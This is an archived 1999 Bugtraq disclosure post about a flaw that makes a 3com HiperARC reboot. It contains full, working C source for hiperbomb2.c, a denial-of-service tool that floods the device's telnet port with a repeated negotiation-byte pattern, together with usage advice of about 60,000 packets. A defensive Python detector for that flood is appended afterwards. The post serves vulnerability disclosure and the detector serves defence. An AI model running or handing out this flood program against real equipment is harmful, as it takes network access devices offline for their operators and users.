Bugtraq mailing list archives

3com hiperarch flaw [hiperbomb.c]


From: jchapman () 1ST NET (Jonathan Chapman)
Date: Thu, 12 Aug 1999 18:10:44 -0400


Hello,

The attached program will reboot a 3com HiperARC.  I made an attempt to
contact 3com before posting this report, however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots.  This program is effective over all
interfaces, including a dialup.

Regards,

Jonathan Chapman
Director of Network Security
FIRST Incorporated
jchapman () 1st net  www.1st.net


/* ---------------------------------------------------------------------
 * hiperbomb2.c - Reboots HiperARC faster.
 * ---------------------------------------------------------------------
 * (c) 1999 - Jonathan Chapman <jchapman () 1st net>
 * ---------------------------------------------------------------------
 * Sends a high volume of IACs which eventually leads to a reboot of the
 * HiperARC.  Brief testing indicated that this problem is most likely 
 * specific to sending IACs rather than any other type of data.  Further
 * research has shown that specific IAC patterns are more likely to cause
 * a reboot.  In this example I use one of the most efficient combinations
 * I have discovered.  Through my testing it usually required at least
 * 60,000 packets to cause the HiperARC to reboot.
 * ---------------------------------------------------------------------
 */


#include <stdio.h>
#include <stdlib.h>     /* exit(), atoi() */
#include <stdarg.h>
#include <fcntl.h>
#include <unistd.h>     /* write() */
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *chassis;
int sockfd, num_of_tries;

void connect_to_chassis(char *name)
{
        struct hostent *host;
        struct sockaddr_in remote;

        host = gethostbyname(name);

        if(!host) {
                fprintf(stderr, "Cannot resolve host %s.\n", name);
                exit(3);
        }

        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        if(sockfd < 0) {
                fprintf(stderr, "Cannot obtain descriptor.\n");
                exit(4);
        }

        remote.sin_family = AF_INET;
        remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
        remote.sin_port = htons(23);    /* telnet */

        /* abort if the connection is refused or times out */
        if(connect(sockfd, (struct sockaddr *)&remote, sizeof(remote)) < 0) {
                fprintf(stderr, "Cannot connect to %s.\n", name);
                exit(5);
        }

        return;
}

void send_iacs(void)
{
        /* Three-byte pattern written num_of_tries times; 254 is the
         * telnet DONT command byte, 36 and 185 follow it as written. */
        unsigned char reply[3] = {254, 36, 185};
        int k;

        for(k = 0; k < num_of_tries; k++) {
                write(sockfd, reply, 3);
        }
}

int main(int ac, char **av)
{

        if(ac < 3) {
                fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
                fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
                exit(2);
        }

        chassis = av[1];
        num_of_tries = atoi(av[2]);

        fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
                chassis, num_of_tries);
        connect_to_chassis(chassis);
        send_iacs();
        fprintf(stderr, "Attack complete.\n");

        exit(0);
}
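A defender-side check for the kind of traffic the post describes, as an added example that is neither part of the original post nor 3com's code: it counts telnet option-negotiation command bytes (WILL/WONT/DO/DONT) per client in a sliding time window and flags a client whose rate looks like this flood. The record format, the client addresses and the window/threshold values are constructed assumptions.

```python
from collections import defaultdict, deque

# Telnet option-negotiation command bytes that follow IAC (255): WILL/WONT/DO/DONT.
WILL, WONT, DO, DONT = 251, 252, 253, 254
NEGOTIATION = {WILL, WONT, DO, DONT}

def count_negotiation_bytes(payload: bytes) -> int:
    """Number of WILL/WONT/DO/DONT command bytes in one client-to-server write."""
    return sum(1 for b in payload if b in NEGOTIATION)

def detect_negotiation_flood(records, window=1.0, threshold=500):
    """Sliding-window rate check per client.

    records: iterable of (timestamp_seconds, client_addr, payload) in time order
    (a constructed format; a real feed would come from a pcap or a telnet proxy).
    Returns one (client, timestamp, count) alert each time a client's
    negotiation-byte count within `window` seconds first exceeds `threshold`.
    """
    recent = defaultdict(deque)   # client -> deque of (ts, count) inside the window
    totals = defaultdict(int)     # client -> running sum of counts in the deque
    alerted = set()
    alerts = []
    for ts, client, payload in records:
        n = count_negotiation_bytes(payload)
        recent[client].append((ts, n))
        totals[client] += n
        # drop entries that fell out of the window
        while recent[client] and ts - recent[client][0][0] > window:
            _, old = recent[client].popleft()
            totals[client] -= old
        if totals[client] > threshold:
            if client not in alerted:
                alerts.append((client, ts, totals[client]))
                alerted.add(client)
        else:
            alerted.discard(client)   # re-arm once the rate drops again
    return alerts

def sample_records():
    """Constructed traffic: a normal login and a client repeating the post's 3-byte pattern."""
    normal = [(0.00, "192.0.2.5", b"\xff\xfd\x18"),   # IAC DO TERMINAL-TYPE
              (0.01, "192.0.2.5", b"\xff\xfb\x18"),   # IAC WILL TERMINAL-TYPE
              (0.20, "192.0.2.5", b"user\r\n")]
    flood = [(i * 0.0005, "192.0.2.7", b"\xfe\x24\xb9") for i in range(1000)]
    return sorted(normal + flood, key=lambda r: r[0])

if __name__ == "__main__":
    for client, ts, count in detect_negotiation_flood(sample_records()):
        print(f"{ts:.4f}s flood from {client}: {count} negotiation bytes in window")
```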
